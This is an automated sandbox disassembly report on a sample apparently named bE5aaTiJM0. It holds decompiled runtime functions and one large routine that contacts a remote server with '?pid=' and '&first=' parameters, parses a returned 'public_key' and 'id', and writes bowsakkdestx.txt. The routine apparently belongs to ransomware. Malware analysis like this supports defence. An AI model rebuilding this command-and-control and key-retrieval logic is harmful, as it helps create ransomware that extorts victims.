__invoke_watson.LIBCMT ref: 004237EA

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00427B0B(int _a4) {
				void* _t4;

				_t1 =  &_a4; // 0x423b69
				E00427AD7(_t4,  *_t1);
				ExitProcess(_a4);
			}

0x00427b0e
0x00427b11
0x00427b1a

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0042FB64(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t13;

				_push(8);
				_push(0x507df0);
				_t4 = E00428520(__ebx, __edi, __esi);
				if( *0x51106c == 0) {
					E00428AF7(6);
					 *(_t13 - 4) =  *(_t13 - 4) & 0x00000000;
					_t16 =  *0x51106c;
					if( *0x51106c == 0) {
						E0042FE47(__ebx, __edx, __edi, __esi, _t16); // executed
						 *0x51106c =  *0x51106c + 1;
					}
					 *(_t13 - 4) = 0xfffffffe;
					_t4 = E0042FBAB();
				}
				return E00428565(_t4);
			}

0x0042fb64
0x0042fb66
0x0042fb6b
0x0042fb77
0x0042fb7b
0x0042fb81
0x0042fb85
0x0042fb8c
0x0042fb8e
0x0042fb93
0x0042fb93
0x0042fb99
0x0042fba0
0x0042fba0
0x0042fbaa

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 360932542-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00427F3D(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00427E0E(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x00427f40
0x00427f42
0x00427f44
0x00427f47
0x00427f50

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696
stringnetworkfileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0041E690(void* __ecx, intOrPtr __edx, char _a4, char _a8, char _a16, char _a256, char _a264, char _a268, char _a272, void _a296, char _a360, char _a361, char _a1292, char _a1296, short _a2368, signed int _a22780, char _a22800, intOrPtr _a22804, int _a22812, char _a22856, intOrPtr _a22880) {
				short _v0;
				char _v4;
				short _v8;
				char _v12;
				char _v14;
				char _v15;
				char _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				char _v45;
				WCHAR* _v48;
				char _v52;
				char _v54;
				intOrPtr _v57;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				long _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				WCHAR* _v100;
				char _v101;
				intOrPtr _v103;
				signed int _v104;
				intOrPtr _v107;
				signed int _v108;
				intOrPtr _v109;
				char _v111;
				char _v122;
				intOrPtr _v134;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t219;
				signed int _t223;
				void* _t227;
				void* _t241;
				signed int _t250;
				signed int _t251;
				WCHAR* _t254;
				signed int _t265;
				int _t266;
				signed int _t274;
				signed int _t275;
				WCHAR* _t278;
				signed int _t288;
				signed int _t291;
				signed int _t294;
				WCHAR* _t298;
				WCHAR* _t303;
				signed int _t313;
				signed int _t318;
				int _t321;
				signed int _t322;
				int _t329;
				char* _t330;
				signed int _t336;
				WCHAR* _t346;
				signed int _t361;
				char _t367;
				void* _t368;
				WCHAR* _t369;
				WCHAR* _t373;
				WCHAR* _t374;
				signed int _t375;
				char _t377;
				signed int* _t381;
				signed int _t382;
				signed int _t383;
				char* _t386;
				intOrPtr* _t389;
				signed int _t390;
				intOrPtr* _t397;
				signed int _t398;
				intOrPtr* _t403;
				signed int _t404;
				intOrPtr* _t407;
				signed int _t408;
				char* _t410;
				char* _t412;
				short* _t415;
				signed int* _t418;
				char* _t419;
				char* _t421;
				intOrPtr* _t423;
				intOrPtr* _t425;
				void* _t429;
				char _t430;
				void* _t431;
				WCHAR* _t432;
				void* _t433;
				WCHAR* _t434;
				char _t435;
				void* _t439;
				unsigned int _t440;
				signed int _t442;
				void* _t443;
				unsigned int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				char* _t457;
				char* _t458;
				void* _t459;
				char* _t462;
				void* _t463;
				void* _t465;
				void* _t466;
				char* _t467;
				void* _t468;
				char* _t469;
				void* _t470;
				short* _t472;

				_t417 = __edx;
				_t453 = _t452 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cb3ec);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t453;
				_push(__ecx);
				E0042F7C0(0x597c);
				_t367 = _a4;
				_push(_t437);
				 *((char*)(_t367 + 4)) = 1;
				E00423F74(timeGetTime());
				_t454 = _t453 + 4;
				_v14 = E0040C6A0();
				_v8 = 4;
				while(1) {
					_t429 = lstrlenA;
					do {
						do {
							while(1) {
								L2:
								_a360 = 0;
								E0042B420( &_a361, 0, 0x3ff);
								_t455 = _t454 + 0xc;
								_v15 = 0;
								if(E0040C500( &_a360, _t417) == 0) {
									goto L4;
								} else {
									_v15 = 1;
								}
								L35:
								_v100 = 0;
								_t437 = 0;
								_t241 = E00423CF0( &_a272, "{\"public_key\":\"");
								_t454 = _t455 + 8;
								if(_t241 != 0) {
									lstrcpyA( &_a1296, _t454 + lstrlenA("{\"public_key\":\"") + 0x188);
									lstrcpyA( &_a272,  &_a1296);
									_t250 = lstrlenA( &_a272);
									__eflags = _t250;
									if(_t250 <= 0) {
										L45:
										_t458 = _t454 - 0x18;
										_v101 = 0;
										_t419 = _t458;
										 *(_t419 + 0x14) = 0xf;
										 *(_t419 + 0x10) = 0;
										 *_t419 = 0;
										__eflags = _a272;
										if(_a272 != 0) {
											_t389 =  &_a272;
											_t97 = _t389 + 1; // 0x1
											_t439 = _t97;
											do {
												_t251 =  *_t389;
												_t389 = _t389 + 1;
												__eflags = _t251;
											} while (_t251 != 0);
											_t390 = _t389 - _t439;
											__eflags = _t390;
											L50:
											_push(_t390);
											E004156D0(_t367, _t419, _t429,  &_a272);
											_t420 = _v109;
											_t254 = E00412900( &_v72, _v109);
											_t459 = _t458 + 0x18;
											__eflags = _t254[0xa] - 8;
											if(_t254[0xa] >= 8) {
												_t254 =  *_t254;
											}
											_t369 = _t367 + 0x7550;
											lstrcpyW(_t369, _t254);
											__eflags = _v48 - 8;
											if(_v48 >= 8) {
												L00422587(_v68);
												_t459 = _t459 + 4;
											}
											_t440 = 2 + lstrlenA( &_a268) * 2;
											_t432 = E00420C62(_t369, _t420, _t429, _t440);
											E0042B420(_t432, 0, _t440);
											_t437 = _t440 >> 1;
											MultiByteToWideChar(0, 0,  &_a268, 0xffffffff, _t432, _t440 >> 1);
											lstrcpyW(_t369, _t432);
											_t417 = 0;
											 *((short*)(_a4 + 0x7550 + _v104 * 2)) = 0;
											_t265 = E00423CF0( &_a268, "\",\"id\":\"");
											_t454 = _t459 + 0x18;
											__eflags = _t265;
											if(_t265 != 0) {
												_t266 = lstrlenW(_t369);
												_t433 = lstrlenA;
												lstrcpyA( &_a1292,  &(( &(( &_a268)[lstrlenA("\",\"id\":\"")]))[_t266]));
												lstrcpyA( &_a268,  &_a1292);
												_v104 = 0;
												_t442 = 0;
												_t274 = lstrlenA( &_a268);
												__eflags = _t274;
												if(_t274 <= 0) {
													L64:
													_t462 = _t454 - 0x18;
													_t421 = _t462;
													 *(_t421 + 0x14) = 0xf;
													 *(_t421 + 0x10) = 0;
													 *_t421 = 0;
													__eflags = _a268;
													if(_a268 != 0) {
														_t397 =  &_a268;
														_t443 = _t397 + 1;
														do {
															_t275 =  *_t397;
															_t397 = _t397 + 1;
															__eflags = _t275;
														} while (_t275 != 0);
														_t398 = _t397 - _t443;
														__eflags = _t398;
														L69:
														_push(_t398);
														E004156D0(0, _t421, _t433,  &_a268);
														_t417 = 0;
														_t278 = E00412900( &_v76, 0);
														_t463 = _t462 + 0x18;
														__eflags = _t278[0xa] - 8;
														if(_t278[0xa] >= 8) {
															_t278 =  *_t278;
														}
														_t373 = _a4 + 0xea80;
														lstrcpyW(_t373, _t278);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v72);
															_t463 = _t463 + 4;
														}
														_t444 = 2 + lstrlenA( &_a264) * 2;
														_t434 = E00420C62(_t373, _t417, _t433, _t444);
														E0042B420(_t434, 0, _t444);
														_t454 = _t463 + 0x10;
														MultiByteToWideChar(0, 0,  &_a264, 0xffffffff, _t434, _t444 >> 1);
														lstrcpyW(_t373, _t434);
														_t435 = _a4;
														_t437 = _t435 + 0x7550;
														 *((short*)(_t435 + 0xea80 + _v108 * 2)) = 0;
														_t288 = lstrlenW(_t437);
														__eflags = _t288;
														if(_t288 <= 0) {
															L75:
															__eflags = _v111;
															if(_v111 == 0) {
																__eflags = _t437;
																if(_t437 != 0) {
																	E00420BED(_t437);
																	_t454 = _t454 + 4;
																}
																__eflags = _t373;
																if(_t373 != 0) {
																	E00420BED(_t373);
																	_t454 = _t454 + 4;
																}
																goto L82;
															}
															goto L76;
														} else {
															_t318 = lstrlenW(_t373);
															__eflags = _t318;
															if(_t318 != 0) {
																 *((char*)(_t435 + 4)) = 0;
																goto L112;
															}
															goto L75;
														}
													}
													_t398 = 0;
													goto L69;
												}
												while(1) {
													__eflags =  *((char*)(_t454 + _t442 + 0x188)) - 0x22;
													if( *((char*)(_t454 + _t442 + 0x188)) == 0x22) {
														break;
													}
													_t442 = _t442 + 1;
													_t321 = lstrlenA( &_a268);
													__eflags = _t442 - _t321;
													if(_t442 < _t321) {
														continue;
													}
													goto L64;
												}
												_v104 = _t442;
												goto L64;
											} else {
												__eflags = _v107 - _t265;
												if(_v107 == _t265) {
													L82:
													E00411B10();
													_t437 = _v104 - 1;
													_v104 = _t437;
													__eflags = _t437;
													if(__eflags <= 0) {
														E0040EF50(0x510020,  &_v104, __eflags, 0x10);
														_t465 = _t454 + 4;
														_v4 = 0xf;
														_v8 = 0;
														_v24 = 0;
														_a22804 = 2;
														_t447 = 0;
														__eflags = 0;
														_t374 = _v104;
														do {
															_t423 =  *((intOrPtr*)(_t374 + _t447 * 4));
															__eflags =  *_t423;
															if( *_t423 != 0) {
																_t403 = _t423;
																_t435 = _t403 + 1;
																do {
																	_t291 =  *_t403;
																	_t403 = _t403 + 1;
																	__eflags = _t291;
																} while (_t291 != 0);
																_t404 = _t403 - _t435;
																__eflags = _t404;
																goto L91;
															}
															_t404 = 0;
															L91:
															_push(_t404);
															E00413EA0(_t374,  &_v24, _t435, _t447, _t423);
															_t447 = _t447 + 1;
															__eflags = _t447 - 0x10;
														} while (__eflags < 0);
														E0040EF50(0x510060,  &_v108, __eflags, 0x10);
														_t466 = _t465 + 4;
														_v32 = 0xf;
														_v36 = 0;
														_v52 = 0;
														_a22800 = 3;
														_t448 = 0;
														__eflags = 0;
														_t375 = _v108;
														do {
															_t425 =  *((intOrPtr*)(_t375 + _t448 * 4));
															__eflags =  *_t425;
															if( *_t425 != 0) {
																_t407 = _t425;
																_t435 = _t407 + 1;
																do {
																	_t294 =  *_t407;
																	_t407 = _t407 + 1;
																	__eflags = _t294;
																} while (_t294 != 0);
																_t408 = _t407 - _t435;
																__eflags = _t408;
																goto L98;
															}
															_t408 = 0;
															L98:
															_push(_t408);
															E00413EA0(_t375,  &_v52, _t435, _t448, _t425);
															_t448 = _t448 + 1;
															__eflags = _t448 - 0x10;
														} while (_t448 < 0x10);
														_t467 = _t466 - 0x18;
														_t410 = _t467;
														_push(0xffffffff);
														 *(_t410 + 0x14) = 0xf;
														 *(_t410 + 0x10) = 0;
														 *_t410 = 0;
														E00413FF0(0, _t410,  &_v32, 0);
														_t298 = E00412900( &_v92, 0);
														_t468 = _t467 + 0x18;
														__eflags = _t298[0xa] - 8;
														if(_t298[0xa] >= 8) {
															_t298 =  *_t298;
														}
														_t377 = _a4;
														lstrcpyW(_t377 + 0x7550, _t298);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v84);
															_t468 = _t468 + 4;
														}
														_t469 = _t468 - 0x18;
														_v122 = 0;
														_t412 = _t469;
														_push(0xffffffff);
														 *(_t412 + 0x14) = 0xf;
														 *(_t412 + 0x10) = 0;
														 *_t412 = 0;
														E00413FF0(_t377, _t412,  &_v60, 0);
														_t303 = E00412900( &_v96, _v134);
														_t470 = _t469 + 0x18;
														__eflags = _t303[0xa] - 8;
														if(_t303[0xa] >= 8) {
															_t303 =  *_t303;
														}
														lstrcpyW(_t377 + 0xea80, _t303);
														__eflags = _v68 - 8;
														if(_v68 >= 8) {
															L00422587(_v88);
															_t470 = _t470 + 4;
														}
														__eflags = _v44 - 0x10;
														 *((char*)(_t377 + 0x15fb7)) = 1;
														if(_v44 >= 0x10) {
															L00422587(_v64);
															_t470 = _t470 + 4;
														}
														__eflags = _v20 - 0x10;
														_v44 = 0xf;
														_v48 = 0;
														_v64 = 0;
														if(_v20 >= 0x10) {
															L00422587(_v40);
														}
														 *((char*)(_t377 + 4)) = 0;
														L112:
														__eflags = 0;
														 *[fs:0x0] = _a22780;
														return 0;
													}
													_t367 = _a4;
													while(1) {
														_t429 = lstrlenA;
														L2:
														_a360 = 0;
														E0042B420( &_a361, 0, 0x3ff);
														_t455 = _t454 + 0xc;
														_v15 = 0;
														if(E0040C500( &_a360, _t417) == 0) {
															goto L4;
														} else {
															_v15 = 1;
														}
													}
												}
												break;
											}
										}
										_t390 = 0;
										goto L50;
									}
									while(1) {
										__eflags =  *((char*)(_t454 +  &(_t437[0xc4]))) - 0x22;
										if( *((char*)(_t454 +  &(_t437[0xc4]))) == 0x22) {
											break;
										}
										_t437 =  &(_t437[0]);
										_t329 = lstrlenA( &_a272);
										__eflags = _t437 - _t329;
										if(_t437 < _t329) {
											continue;
										}
										goto L45;
									}
									_v100 = _t437;
									goto L45;
								}
								if(_v103 == _t241) {
									goto L82;
								}
								_t330 =  &_a8;
								__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t330);
								if(_t330 >= 0) {
									PathAppendA( &_v12, "bowsakkdestx.txt");
									DeleteFileA( &_v16);
								}
								continue;
								L4:
								_v12 = 0;
								_t368 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0);
								_v0 = 7;
								_v4 = 0;
								_v20 = 0;
								_t430 = _a4;
								_t418 = _t430 + 0x20;
								_a22880 = 0;
								__eflags =  *_t418;
								if( *_t418 != 0) {
									_t381 = _t418;
									_t437 =  &(_t381[0]);
									goto L7;
									L7:
									_t219 =  *_t381;
									_t381 =  &(_t381[0]);
									__eflags = _t219;
									if(_t219 != 0) {
										goto L7;
									} else {
										_t382 = _t381 - _t437;
										__eflags = _t382;
										_t383 = _t382 >> 1;
										goto L9;
									}
								} else {
									_t383 = 0;
									L9:
									_push(_t383);
									E00415AE0(_t368,  &_v20, _t430, _t437, _t418);
									__eflags = _v8 - 8;
									_push(L".bit/");
									_t222 =  >=  ? _v28 :  &_v28;
									_push( >=  ? _v28 :  &_v28);
									_t223 = E00421C02( &_v20);
									_t456 = _t455 + 8;
									__eflags = _t223;
									if(_t223 != 0) {
										_t472 = _t456 - 0x18;
										_t415 = _t472;
										_push(0xffffffff);
										 *(_t415 + 0x14) = 7;
										 *(_t415 + 0x10) = 0;
										 *_t415 = 0;
										E00414690(_t368, _t415,  &_v24, 0);
										_t437 = E0040DD40( &_v12);
										_t456 = _t472 + 0x18;
										__eflags =  &_v36 - _t437;
										if( &_v36 != _t437) {
											_v8 = 7;
											_v12 = 0;
											_v28 = 0;
											__eflags = _t437[0xa] - 8;
											if(_t437[0xa] >= 8) {
												_v28 =  *_t437;
												 *_t437 = 0;
											} else {
												_t361 = _t437[8] + 1;
												__eflags = _t361;
												if(_t361 != 0) {
													E004205A0( &_v28, _t437, _t361 + _t361);
													_t456 = _t456 + 0xc;
												}
											}
											_v12 = _t437[8];
											_v8 = _t437[0xa];
											__eflags = 0;
											_t437[0xa] = 7;
											_t437[8] = 0;
											 *_t437 = 0;
										}
										__eflags = _a16 - 8;
										if(_a16 >= 8) {
											L00422587(_v4);
											_t456 = _t456 + 4;
										}
									}
									_push(5);
									E00415AE0(_t368,  &_v24, _t430, _t437, L"?pid=");
									_t457 = _t456 - 0x18;
									_v45 = 0;
									_t386 = _t457;
									_push(0xffffffff);
									 *(_t386 + 0x14) = 0xf;
									 *(_t386 + 0x10) = 0;
									 *_t386 = 0;
									E00413FF0(_t368, _t386, _t430 + 8, 0);
									_t417 = _v57;
									_t227 = E00412900( &_v20, _v57);
									_t455 = _t457 + 0x18;
									_push(0xffffffff);
									_push(0);
									_a22856 = 1;
									L004159D0(_t368,  &_v44, _t430, _t437, _t227);
									__eflags = _v12 - 8;
									if(_v12 >= 8) {
										L00422587(_v16);
										_t455 = _t455 + 4;
									}
									__eflags = _v20 - 8;
									_t230 =  >=  ? _v40 :  &_v40;
									lstrcpyW( &_a2368,  >=  ? _v40 :  &_v40);
									__eflags =  *((char*)(_t430 + 0x15fb5));
									if( *((char*)(_t430 + 0x15fb5)) == 0) {
										__eflags =  *((char*)(_t430 + 0x15fb6));
										if( *((char*)(_t430 + 0x15fb6)) == 0) {
											__eflags = _v54;
											_t346 =  &_a2368;
											if(_v54 == 0) {
												_push(L"&first=false");
											} else {
												_push(L"&first=true");
											}
											lstrcatW(_t346, ??);
										}
									}
									_t431 = InternetOpenUrlW(_t368,  &_a2368, 0, 0, 0, 0);
									InternetReadFile(_t431,  &_a296, 0x400,  &_v76);
									__eflags = _v92;
									if(_v92 > 0) {
										_t336 =  &_a16;
										__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t336);
										__eflags = _t336;
										if(_t336 >= 0) {
											PathAppendA( &_v4, "bowsakkdestx.txt");
											_t451 = E004220B6( &_v8, "w");
											_t455 = _t455 + 8;
											__eflags = _t451;
											if(__eflags != 0) {
												_push(_t451);
												_push(lstrlenA( &_a256));
												_push(1);
												_push( &_a256);
												E00422B02(_t368, _t417, _t431, _t451, __eflags);
												_push(_t451);
												E00423A38(_t368, _t431, _t451, __eflags);
												_t455 = _t455 + 0x14;
											}
										}
									}
									InternetCloseHandle(_t431);
									InternetCloseHandle(_t368);
									_a22812 = 0xffffffff;
									__eflags = _v68 - 8;
									if(_v68 >= 8) {
										L00422587(_v88);
										_t455 = _t455 + 4;
									}
									_t367 = _a4;
									_t429 = lstrlenA;
									goto L35;
								}
							}
							_t322 =  &_a4;
							__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t322);
							_t429 = lstrlenA;
							_t367 = _a4;
							__eflags = _t322;
						} while (_t322 < 0);
						PathAppendA( &_v16, "bowsakkdestx.txt");
						DeleteFileA( &_v20);
						while(1) {
							_t429 = lstrlenA;
							goto L2;
						}
						L76:
						_t313 =  &_v0;
						__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t313);
						_t429 = lstrlenA;
						_t367 = _a4;
						__eflags = _t313;
					} while (_t313 < 0);
					PathAppendA( &_v20, "bowsakkdestx.txt");
					DeleteFileA( &_v24);
				}
			}

0x0041e690
0x0041e693
0x0041e696
0x0041e698
0x0041e6a3
0x0041e6a4
0x0041e6ab
0x0041e6b1
0x0041e6b7
0x0041e6ba
0x0041e6bc
0x0041e6c7
0x0041e6cc
0x0041e6d4
0x0041e6d8
0x0041e6e0
0x0041e6e0
0x0041e6f0
0x0041e6f0
0x0041e6f0
0x0041e6f0
0x0041e6fc
0x0041e707
0x0041e70c
0x0041e70f
0x0041e722
0x00000000
0x0041e724
0x0041e724
0x0041e724
0x0041ea1f
0x0041ea26
0x0041ea34
0x0041ea36
0x0041ea3b
0x0041ea40
0x0041eaa4
0x0041eaba
0x0041eac8
0x0041eaca
0x0041eacc
0x0041eaef
0x0041eaef
0x0041eaf2
0x0041eaf7
0x0041eaf9
0x0041eb00
0x0041eb07
0x0041eb0a
0x0041eb12
0x0041eb18
0x0041eb1f
0x0041eb1f
0x0041eb22
0x0041eb22
0x0041eb24
0x0041eb25
0x0041eb25
0x0041eb29
0x0041eb29
0x0041eb2b
0x0041eb2b
0x0041eb36
0x0041eb3b
0x0041eb43
0x0041eb48
0x0041eb4b
0x0041eb4f
0x0041eb51
0x0041eb51
0x0041eb54
0x0041eb5b
0x0041eb61
0x0041eb66
0x0041eb6c
0x0041eb71
0x0041eb71
0x0041eb7e
0x0041eb8e
0x0041eb94
0x0041eb9c
0x0041ebae
0x0041ebb6
0x0041ebc0
0x0041ebca
0x0041ebda
0x0041ebdf
0x0041ebe2
0x0041ebe4
0x0041ec3e
0x0041ec44
0x0041ec6d
0x0041ec7f
0x0041ec88
0x0041ec91
0x0041ec93
0x0041ec95
0x0041ec97
0x0041ecbf
0x0041ecbf
0x0041ecc4
0x0041ecc6
0x0041eccd
0x0041ecd4
0x0041ecd6
0x0041ecdd
0x0041ece3
0x0041ecea
0x0041ecf0
0x0041ecf0
0x0041ecf2
0x0041ecf3
0x0041ecf3
0x0041ecf7
0x0041ecf7
0x0041ecf9
0x0041ecf9
0x0041ed04
0x0041ed09
0x0041ed0f
0x0041ed14
0x0041ed17
0x0041ed1b
0x0041ed1d
0x0041ed1d
0x0041ed23
0x0041ed2a
0x0041ed30
0x0041ed35
0x0041ed3b
0x0041ed40
0x0041ed40
0x0041ed4d
0x0041ed5d
0x0041ed63
0x0041ed68
0x0041ed7d
0x0041ed85
0x0041ed8b
0x0041ed94
0x0041ed9b
0x0041eda3
0x0041eda9
0x0041edab
0x0041edbc
0x0041edbc
0x0041edc1
0x0041ee10
0x0041ee12
0x0041ee15
0x0041ee1a
0x0041ee1a
0x0041ee1d
0x0041ee1f
0x0041ee22
0x0041ee27
0x0041ee27
0x00000000
0x0041ee1f
0x00000000
0x0041edad
0x0041edae
0x0041edb4
0x0041edb6
0x0041ee44
0x00000000
0x0041ee44
0x00000000
0x0041edb6
0x0041edab
0x0041ecdf
0x00000000
0x0041ecdf
0x0041eca0
0x0041eca0
0x0041eca8
0x00000000
0x00000000
0x0041ecb1
0x0041ecb3
0x0041ecb5
0x0041ecb7
0x00000000
0x00000000
0x00000000
0x0041ecb9
0x0041ecbb
0x00000000
0x0041ebe6
0x0041ebe6
0x0041ebea
0x0041ee2a
0x0041ee2a
0x0041ee33
0x0041ee34
0x0041ee38
0x0041ee3a
0x0041ee58
0x0041ee5d
0x0041ee60
0x0041ee68
0x0041ee70
0x0041ee75
0x0041ee80
0x0041ee80
0x0041ee82
0x0041ee86
0x0041ee86
0x0041ee89
0x0041ee8c
0x0041ee92
0x0041ee94
0x0041ee97
0x0041ee97
0x0041ee99
0x0041ee9a
0x0041ee9a
0x0041ee9e
0x0041ee9e
0x00000000
0x0041ee9e
0x0041ee8e
0x0041eea0
0x0041eea0
